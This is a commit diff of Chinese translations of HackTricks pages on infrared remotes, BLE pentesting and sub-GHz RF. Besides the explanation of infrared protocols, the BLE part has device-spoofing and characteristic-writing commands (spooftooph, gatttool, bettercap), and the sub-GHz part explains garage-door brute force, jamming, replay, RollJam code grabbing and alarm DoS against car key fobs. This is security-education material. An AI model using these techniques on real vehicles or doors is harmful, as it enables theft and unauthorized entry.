* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 红外线工作原理 <a href="#how-the-infrared-port-works" id="how-the-infrared-port-works"></a>
## 红外线工作原理 <a href="#how-the-infrared-port-works" id="how-the-infrared-port-works"></a>
**红外光对人类是不可见的**。红外波长范围为**0.7到1000微米**。家用遥控器使用红外信号进行数据传输工作波长范围为0.75..1.4微米。遥控器中的微控制器会以特定频率使红外LED闪烁将数字信号转换为红外信号。
**红外线光对人类是不可见的**。红外线波长范围为 **0.7 1000 微米**。家用遥控器使用红外信号进行数据传输,工作波长范围为 0.75..1.4 微米。遥控器中的微控制器使红外 LED 以特定频率闪烁,将数字信号转换为红外信号。
为了接收红外信号,使用**光接收器**。它将**红外光转换为电压脉冲**,这些脉冲已经是**数字信号**。通常,接收器内部有一个**暗光滤波器**,只允许**所需波长通过**,并消除噪音
接收红外信号使用 **光接收器**。它 **将红外光转换为电压脉冲**,这些脉冲已经是 **数字信号**。通常,接收器内部有一个 **暗光滤波器**,只允许 **所需波长通过**,并过滤掉噪声
### 各种红外协议 <a href="#variety-of-ir-protocols" id="variety-of-ir-protocols"></a>
### 红外协议的多样性 <a href="#variety-of-ir-protocols" id="variety-of-ir-protocols"></a>
红外协议在3个因素上有所不同:
红外协议在个因素上有所不同:
* 位编码
* 数据结构
* 载波频率 — 通常在36..38千赫范围内
* 载波频率 — 通常在 36..38 kHz 范围内
#### 位编码方式 <a href="#bit-encoding-ways" id="bit-encoding-ways"></a>
**1. 脉冲距编码**
**1. 脉冲距编码**
通过调制脉冲之间的间隔持续时间来对位进行编码。脉冲本身的宽度是恒定的。
通过调制脉冲之间的间隔持续时间来编码。脉冲本身的宽度是恒定的。
<figure><img src="../../.gitbook/assets/image (295).png" alt=""><figcaption></figcaption></figure>
**2. 脉冲宽度编码**
通过调制脉冲宽度来对位进行编码。脉冲爆发后的间隔宽度是恒定的。
通过调制脉冲宽度来编码。脉冲爆发后的间隔宽度是恒定的。
<figure><img src="../../.gitbook/assets/image (282).png" alt=""><figcaption></figcaption></figure>
**3. 相位编码**
也称为曼彻斯特编码。逻辑值由脉冲爆发和间隔之间的极性转换来定义。"间隔到脉冲爆发"表示逻辑"0""脉冲爆发到间隔"表示逻辑"1"
也称为曼彻斯特编码。逻辑值由脉冲爆发与间隔之间的过渡极性定义。“间隔到脉冲爆发”表示逻辑“0”“脉冲爆发到间隔”表示逻辑“1”
<figure><img src="../../.gitbook/assets/image (634).png" alt=""><figcaption></figcaption></figure>
**4. 前述方法的组合和其他特殊方法**
**4. 之前编码方式的组合和其他特殊方式**
{% hint style="info" %}
有些红外协议**试图成为多种设备的通用协议**。最著名的是RC5和NEC。不幸的是最著名的**并不意味着最常见**。在我的环境中我只遇到了两个NEC遥控器没有遇到RC5遥控器。
有些红外协议 **试图成为多种设备的通用协议**。最著名的有 RC5 和 NEC。不幸的是最著名的 **并不意味着最常见**。在我的环境中,我只遇到过两个 NEC 遥控器,而没有 RC5 遥控器。
制造商喜欢在同一范围内的设备(例如电视盒)中使用自己独特的红外协议。因此,来自不同公司的遥控器,有时甚至来自同一公司的不同型号,无法与同类型的其他设备配合使用。
制造商喜欢使用自己独特的红外协议,即使在同一系列设备中(例如,电视盒)。因此,不同公司的遥控器,有时同一公司的不同型号,无法与同类型的其他设备配合使用。
{% endhint %}
### 探索红外信号
查看遥控器红外信号外观最可靠的方法是使用示波器。它不会解调或反转接收到的信号只是“原样”显示。这对于测试和调试很有用。我将以NEC红外协议为例展示预期信号。
查看遥控器红外信号的最可靠方法是使用示波器。它不会解调或反转接收到的信号,而是“原样”显示。这对于测试和调试非常有用。我将以 NEC 红外协议为例展示预期信号。
<figure><img src="../../.gitbook/assets/image (235).png" alt=""><figcaption></figcaption></figure>
通常,编码数据包的开头有一个前导码。这使接收器能够确定增益和背景水平。也有一些没有前导码的协议例如Sharp
通常,编码数据包的开头有一个前导码。这使接收器能够确定增益和背景水平。也有没有前导码的协议,例如,夏普
然后传输数据。结构、前导码和位编码方法由具体协议确定。
然后传输数据。结构、前导码和位编码方法由特定协议决定。
**NEC红外协议**包含一个命令和一个重复码,在按下按钮时发送。命令和重复码在开头都有相同的前导码。
**NEC 红外协议**包含一个短命令和一个重复码,在按下按钮时发送。命令和重复码在开头都有相同的前导码。
NEC的**命令**除了前导码外,还包括地址字节和命令号字节,设备通过这些字节了解需要执行什么操作。地址和命令号字节是具有相反值的重复值,以检查传输的完整性。命令末尾还有一个额外的停止位。
NEC **命令**除了前导码外,还由一个地址字节和一个命令编号字节组成,设备通过这些字节理解需要执行的操作。地址和命令编号字节用反向值进行重复,以检查传输的完整性。命令末尾有一个额外的停止位。
**重复码**在前导码后有一个“1”这是一个停止位。
**重复码**在前导码后有一个“1”这是一个停止位。
对于逻辑“0”和“1”NEC使用脉冲距离编码首先传输脉冲爆发然后是一个间隔,其长度设置位的值。
对于 **逻辑“0”和“1”**NEC 使用脉冲间距编码:首先传输一个脉冲爆发,然后是一个暂停,其长度设置位的值。
### 空调
与其他遥控器不同,**空调不仅传输按下按钮的代码**。它们还在按下按钮时**传输所有信息**,以确保**空调机器和遥控器同步**。\
这将避免一个设定为20ºC的机器被一个遥控器增加到21ºC然后当另一个遥控器仍将温度设定为20ºC用于进一步增加温度时它会“增加”到21ºC而不是以为是在21ºC时增加到22ºC
与其他遥控器不同,**空调不仅传输按下按钮的代码**。它们还 **在按下按钮时传输所有信息**,以确保 **空调和遥控器同步**。\
这将避免将设置为 20ºC 的机器用一个遥控器增加到 21ºC然后当使用另一个仍将温度设置为 20ºC 的遥控器进一步增加温度时,它会“增加”到 21ºC而不是 22ºC认为它在 21ºC
### 攻击
您可以使用Flipper Zero对红外线进行攻击
您可以使用 Flipper Zero 攻击红外线
{% content-ref url="flipper-zero/fz-infrared.md" %}
[fz-infrared.md](flipper-zero/fz-infrared.md)
{% endcontent-ref %}
## 参考资料
## 参考文献
* [https://blog.flipperzero.one/infrared/](https://blog.flipperzero.one/infrared/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,34 +1,35 @@
# BLE渗透测试 - 蓝牙低功耗
# Pentesting BLE - Bluetooth Low Energy
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 介绍
蓝牙4.0规范以来BLE仅使用40个信道覆盖2400至2483.5 MHz范围。相比之下传统蓝牙在同一范围内使用79个信道。
Bluetooth 4.0规范以来BLE仅使用40个频道覆盖2400到2483.5 MHz的范围。相比之下传统蓝牙在同一范围内使用79个频道。
BLE设备通过发送**广播包****信标**)进行通信,这些包向其他附近设备广播BLE设备的存在。这些信标有时也会**发送数据**。
BLE设备通过发送**广告数据包****信标**)进行通信,这些数据包向其他附近设备广播BLE设备的存在。这些信标有时也会**发送数据**。
监听设备,也称为中央设备,可以通过向广告设备发送专门的**扫描请求**来响应广播包。对该扫描的**响应**使用与**广播**包相同的结构,还包含无法放在初始广告请求中的其他信息,例如完整设备名称。
监听设备,也称为中央设备,可以通过向广告设备发送特定的**扫描请求**来响应广告数据包。该扫描的**响应**使用与**广告**数据包相同的结构,并包含无法在初始广告请求中容纳的附加信息,例如完整的设备名称。
![](<../../.gitbook/assets/image (152).png>)
前导字节同步频率,而四字节的访问地址是一个**连接标识符**,用于在多个设备尝试在相同信道上建立连接的情况下使用。接下来,协议数据单元(**PDU**)包含**广告数据**。有几种类型的PDU最常用的是ADV\_NONCONN\_IND和ADV\_IND。如果设备**不接受连接**,则使用**ADV\_NONCONN\_IND** PDU类型仅在广播包中传输数据。如果设备**允许连接**并且**一旦建立连接**就**停止发送广告**包,则使用**ADV\_IND**。
前导字节用于同步频率,而四字节访问地址是**连接标识符**,在多个设备尝试在同一频道上建立连接的场景中使用。接下来,协议数据单元(**PDU**)包含**广告数据**。PDU有几种类型最常用的是ADV\_NONCONN\_IND和ADV\_IND。如果设备**不接受连接**,则使用**ADV\_NONCONN\_IND** PDU类型仅在广告数据包中传输数据。如果设备**允许连接**,并且在**建立连接**后**停止发送广告**数据包,则使用**ADV\_IND**。
### GATT
**通用属性配置文件**GATT定义了**设备应如何格式化和传输数据**。当您分析BLE设备的攻击面时通常会集中注意力在GATT或GATTs因为这是**触发设备功能**以及存储、分组和修改数据的方式。GATT以16位或32位值的形式在表中列出设备的特征、描述符和服务。**特征**是在中央设备和外围设备之间**发送**的**数据**值。这些特征可以有**提供有关它们的附加信息的描述符**。如果它们与执行特定操作相关,则**特征**通常会**分组**在**服务**中。
**通用属性配置文件**GATT定义了**设备应如何格式化和传输数据**。当您分析BLE设备的攻击面时您通常会将注意力集中在GATT或GATTs因为这是**设备功能被触发**以及数据被存储、分组和修改的方式。GATT以表格形式列出设备的特性、描述符和服务值为16位或32位。**特性**是**在中央设备和外设之间发送的**数据值。这些特性可以具有**描述符**,以**提供有关它们的附加信息**。如果特性与执行特定操作相关,则**特性**通常会在**服务**中**分组**。
## 枚举
```bash
@ -42,8 +43,8 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool
**GATTool** 允许与另一个设备**建立**连接,列出该设备的**特征**,并读取和写入其属性。\
GATTTool可以使用`-I`选项启动交互式 shell
**GATTool** 允许与另一个设备 **建立** **连接**,列出该设备的 **特征**,并读取和写入其属性。\
GATTTool 可以使用 `-I` 选项启动交互式 shell
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
@ -76,16 +77,17 @@ sudo bettercap --eval "ble.recon on"
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现我们的独家[**NFTs**]收藏品(https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,112 +1,116 @@
# Sub-GHz RF
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 车库门
## Garage Doors
车库门开启器通常在300-190 MHz范围内运行最常见的频率为300 MHz、310 MHz、315 MHz和390 MHz。车库门开启器通常使用这个频率范围因为与其他频段相比这个频率范围更不拥挤不太可能受到其他设备的干扰。
车库门开关通常在 300-190 MHz 范围内工作,最常见的频率为 300 MHz、310 MHz、315 MHz 和 390 MHz。这个频率范围通常用于车库门开关因为它比其他频段更不拥挤并且不太可能受到其他设备的干扰。
## 车门
## Car Doors
大多数汽车钥匙遥控器使用**315 MHz或433 MHz**。这两种都是无线电频率用于各种不同的应用。这两种频率之间的主要区别在于433 MHz的范围比315 MHz更长。这意味着433 MHz更适用于需要更长范围的应用,例如远程无钥匙进入。\
在欧洲,常用的是433.92MHz,在美国和日本则是315MHz。
大多数汽车钥匙遥控器工作在 **315 MHz 或 433 MHz**。这两者都是无线电频率,广泛用于各种不同的应用。两个频率之间的主要区别是 433 MHz 的范围比 315 MHz 更长。这意味着 433 MHz 更适合需要更长范围的应用,例如远程无钥匙进入。\
在欧洲,常用 433.92MHz,而在美国和日本则是 315MHz。
## **暴力破解攻击**
## **Brute-force Attack**
<figure><img src="../../.gitbook/assets/image (1084).png" alt=""><figcaption></figcaption></figure>
如果不是发送每个代码5次这样发送是为了确保接收器收到而只发送一次时间可以缩短到6分钟:
如果不发送每个代码 5 次(这样发送是为了确保接收器能接收到),而只发送一次,时间将减少到 6 分钟:
<figure><img src="../../.gitbook/assets/image (622).png" alt=""><figcaption></figcaption></figure>
如果**去除信号之间的2毫秒等待**时间可以将时间缩短到3分钟。
如果**去掉信号之间的 2 毫秒等待**,你可以 **将时间减少到 3 分钟。**
此外,通过使用德布鲁因序列(一种减少发送所有潜在二进制数所需位数的方法),这个**时间仅缩短到8秒**
此外,通过使用 De Bruijn 序列(减少发送所有潜在二进制数字所需的位数的方法),这个 **时间仅减少到 8 秒**
<figure><img src="../../.gitbook/assets/image (583).png" alt=""><figcaption></figcaption></figure>
这种攻击的示例已在[https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)中实现。
此攻击的示例已在 [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame) 中实现。
需要**前导码**将避免德布鲁因序列优化,而**滚动代码将防止这种攻击**(假设代码足够长,无法通过暴力破解获得)。
要求 **前导码将避免 De Bruijn 序列** 优化,而 **滚动代码将防止此攻击**(假设代码足够长,不易被暴力破解)。
## 亚GHz攻击
## Sub-GHz Attack
使用Flipper Zero攻击这些信号请查看
攻击这些信号,请查看 Flipper Zero
{% content-ref url="flipper-zero/fz-sub-ghz.md" %}
[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md)
{% endcontent-ref %}
## 滚动代码保护
## Rolling Codes Protection
自动车库门开启器通常使用无线遥控器来打开和关闭车库门。遥控器**发送无线电频率RF信号**给车库门开启器,激活电机打开或关闭门。
自动车库门开关通常使用无线遥控器来打开和关闭车库门。遥控器 **发送无线电频率 (RF) 信号** 到车库门开关,激活电机以打开或关闭门。
有人可以使用称为代码抓取器的设备拦截RF信号并记录以供以后使用。这被称为**重放攻击**。为了防止这种类型的攻击,许多现代车库门开启器使用更安全的加密方法,称为**滚动代码**系统。
有人可能会使用称为代码抓取器的设备来拦截 RF 信号并记录以备后用。这被称为 **重放攻击**。为了防止这种攻击,许多现代车库门开关使用一种更安全的加密方法,称为 **滚动代码** 系统。
**RF信号通常使用滚动代码**传输,这意味着每次使用时代码都会更改。这使得某人很难**拦截**信号并将其用于未经授权地访问车库
**RF 信号通常使用滚动代码进行传输**,这意味着代码在每次使用时都会更改。这使得 **拦截** 信号并 **利用** 它获得 **未授权** 访问车库变得 **困难**
在滚动代码系统中,遥控器和车库门开启器有一个**共享算法**,每次使用遥控器时都会**生成一个新代码**。车库门开启器只会响应**正确的代码**,这使得某人仅通过捕获代码就更难未经授权地访问车库
在滚动代码系统中,遥控器和车库门开关有一个 **共享算法**,每次使用遥控器时 **生成一个新代码**。车库门开关只会对 **正确代码** 作出响应,这使得仅通过捕获代码就获得未授权访问车库变得更加困难
### **缺失链接攻击**
### **Missing Link Attack**
基本上,您监听按钮并在设备(如汽车或车库)**超出范围时捕获信号**。然后,您移动到设备并**使用捕获的代码打开它**
基本上,你监听按钮并 **在遥控器超出设备范围时捕获信号**(比如汽车或车库)。然后你移动到设备并 **使用捕获的代码打开它**
### 完整链接干扰攻击
### Full Link Jamming Attack
攻击者可以在车辆或接收器附近**干扰信号**,使**接收器实际上无法‘听到’代码**,一旦发生这种情况,您可以简单地**捕获和重放**代码
攻击者可以 **在车辆或接收器附近干扰信号**,使得 **接收器无法真正“听到”代码**,一旦发生这种情况,你可以简单地 **捕获并重放** 代码,当你停止干扰时
受害者最终会使用**钥匙锁车**,但攻击将已经记录了足够多的“关闭车门”代码,希望可以重新发送以打开车门(可能需要**更改频率**,因为有些车辆使用相同的代码来打开和关闭,但在不同频率上监听两个命令)。
受害者在某个时刻会使用 **钥匙锁定汽车**,但攻击者将 **记录足够的“关门”代码**,希望能够重新发送以打开门(可能需要 **更改频率**,因为有些汽车使用相同的代码来开关,但在不同频率下监听两个命令)。
{% hint style="warning" %}
**干扰有效**,但如果**锁车的人简单地测试门**以确保它们已锁上,他们会注意到车辆未锁定。此外,如果他们意识到此类攻击,甚至可以听到车门从未发出锁定**声音**或汽车**灯光**在按下“锁定”按钮时未闪烁。
**干扰有效**,但很明显,因为如果 **锁车的人简单地测试车门** 以确保它们被锁定,他们会注意到汽车未锁。此外,如果他们意识到这种攻击,他们甚至可以听到车门从未发出锁定的 **声音** 或汽车的 **灯光** 在他们按下“锁定”按钮时从未闪烁。
{% endhint %}
### **代码抓取攻击又名RollJam**
### **Code Grabbing Attack ( aka RollJam )**
这是一种更**隐蔽的干扰技术**。攻击者将干扰信号,因此当受害者尝试锁定门时,它不起作用,但攻击者将**记录此代码**。然后,受害者将**再次尝试锁定汽车**按下按钮,汽车将**记录第二个代码**。\
在此之后,**攻击者可以发送第一个代码**,汽车将锁定(受害者会认为第二次按下按钮已关闭)。然后,攻击者将能够**发送第二个窃取的代码以打开**汽车(假设**“关闭车”代码也可以用于打开**)。可能需要更改频率(因为有些车辆使用相同的代码来打开和关闭,但在不同频率上监听两个命令)。
这是一种更 **隐蔽的干扰技术**。攻击者将干扰信号,因此当受害者尝试锁门时将无法工作,但攻击者会 **记录此代码**。然后,受害者将 **再次尝试锁定汽车**,按下按钮,汽车将 **记录第二个代码**。\
紧接着,**攻击者可以发送第一个代码**,然后 **汽车将锁定**(受害者会认为第二次按下锁定了)。然后,攻击者将能够 **发送第二个被盗代码以打开** 汽车(假设 **“关车”代码也可以用来打开它**)。可能需要更改频率(因为有些汽车使用相同的代码来开关,但在不同频率下监听两个命令)。
攻击者可以**干扰汽车接收器而不是自己的接收器**因为如果汽车接收器在例如1MHz宽带中监听攻击者不会**干扰**遥控器使用的确切频率,而是**在该频谱中的一个接近频率**,而**攻击者的接收器将在较小范围内监听**,在那里他可以**听到遥控器信号而不受干扰信号的影响**
攻击者可以 **干扰汽车接收器而不是他的接收器**,因为如果汽车接收器在例如 1MHz 宽带中监听,攻击者不会 **干扰** 遥控器使用的确切频率,而是 **在该频谱中的一个接近频率**,同时 **攻击者的接收器将在更小的范围内监听**,他可以在 **没有干扰信号** 的情况下监听遥控信号
{% hint style="warning" %}
其他规范中看到的实现显示**滚动代码是发送的总代码的一部分**。即发送的代码是一个**24位密钥**,其中前**12位是滚动代码**第二个8位是命令如锁定或解锁最后4位是**校验和**。实施这种类型的车辆也天然容易受到攻击,因为攻击者只需替换滚动代码段即可**在两个频率上使用任何滚动代码**。
其他规格中的实现显示 **滚动代码是发送的总代码的一部分**。即发送的代码是 **24 位密钥**,其中前 **12 位是滚动代码****第二个 8 位是命令**(如锁定或解锁),最后 4 位是 **校验和**。实施这种类型的车辆也自然容易受到攻击,因为攻击者只需替换滚动代码段即可 **在两个频率上使用任何滚动代码**
{% endhint %}
{% hint style="danger" %}
请注意,如果受害者在攻击者发送第一个代码时发送第三个代码,则第一个和第二个代码将效。
### 报警声干扰攻击
请注意,如果受害者在攻击者发送第一个代码时发送第三个代码,则第一个和第二个代码将效。
{% endhint %}
针对安装在汽车上的售后滚动码系统进行测试,**立即发送相同的代码**会**激活报警器**和防盗装置,提供了一种独特的**拒绝服务**机会。具有讽刺意味的是,**禁用报警器**和防盗装置的方法是**按下**遥控器,使攻击者能够**持续执行 DoS 攻击**。或者将此攻击与**先前的攻击混合**,以获取更多代码,因为受害者希望尽快停止攻击。
### Alarm Sounding Jamming Attack
## 参考资料
针对安装在汽车上的后市场滚动代码系统进行测试,**立即发送相同的代码两次** **激活了警报** 和防盗装置,提供了一个独特的 **拒绝服务** 机会。讽刺的是,**禁用警报** 和防盗装置的方法是 **按下** **遥控器**,这使得攻击者能够 **持续执行 DoS 攻击**。或者将此攻击与 **前一个攻击结合以获取更多代码**,因为受害者希望尽快停止攻击。
## References
* [https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/](https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/)
* [https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/](https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/)
* [https://samy.pl/defcon2015/](https://samy.pl/defcon2015/)
* [https://hackaday.io/project/164566-how-to-hack-a-car/details](https://hackaday.io/project/164566-how-to-hack-a-car/details)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上**关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,33 +1,34 @@
# HackTricks Values & FAQ
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
